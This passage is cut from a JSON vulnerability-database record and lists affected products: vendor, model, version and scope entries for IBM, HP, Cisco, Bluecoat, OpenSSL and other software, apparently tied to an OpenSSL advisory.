"flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79550" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2-77" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073830" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.2.2.2" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37001.1" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "power system s814", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310025820" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.2" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.21" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.3" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.6.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "10.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.40" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems 350.b1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.27" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "cognos planning interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.12" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087380" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems 350.e0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "sparc enterprise m5000", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.21" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "alienvault", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.15.1" }, { "model": "command center appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.96" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "project openssl 1.0.1k", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50001.1" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "power systems 350.e1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ctpview", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "netezza platform software 7.0.2.15-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6.156" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.00" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.13" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.8" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12" }, { "model": "system management homepage c", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079450" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.4(7.26)" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8.0.10" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.19" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "app for stream", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.2" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "power systems 350.a0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "systems insight manager sp5", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.3" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "proxyav", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(5.106)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.3" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "sparc enterprise m4000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.1.8" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.1.8" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.3" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22079060" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88042590" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.68" }, { "model": "content analysis system", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.00" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.02" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.102" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.22" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "application policy infrastructure controller 1.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "norman shark scada protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "820.03" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205577" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15-210" }, { "model": "10g vfsm for bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.6.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571451.43" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365042550" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.9.1" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571910" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0-103" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12.201" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.16" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.95" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.1.3.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.81" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-95" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.8" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.00" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "ace30 application control engine module 3.0 a5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "junos os 12.3r10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.45" }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.96" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.3" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571480" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.6" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.7" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.1" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2.127" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.50" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cms r17 r4", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087220" }, { "model": "sparc enterprise m9000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073800" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.60" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "netezza platform software 7.1.0.4-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "powerlinux 7r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "norman shark network protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "proxysg sgos", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "6.5.6.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1-73" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "infosphere master data management patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "power systems 350.b0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system idataplex dx360 m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x63910" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "sparc enterprise m4000", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", 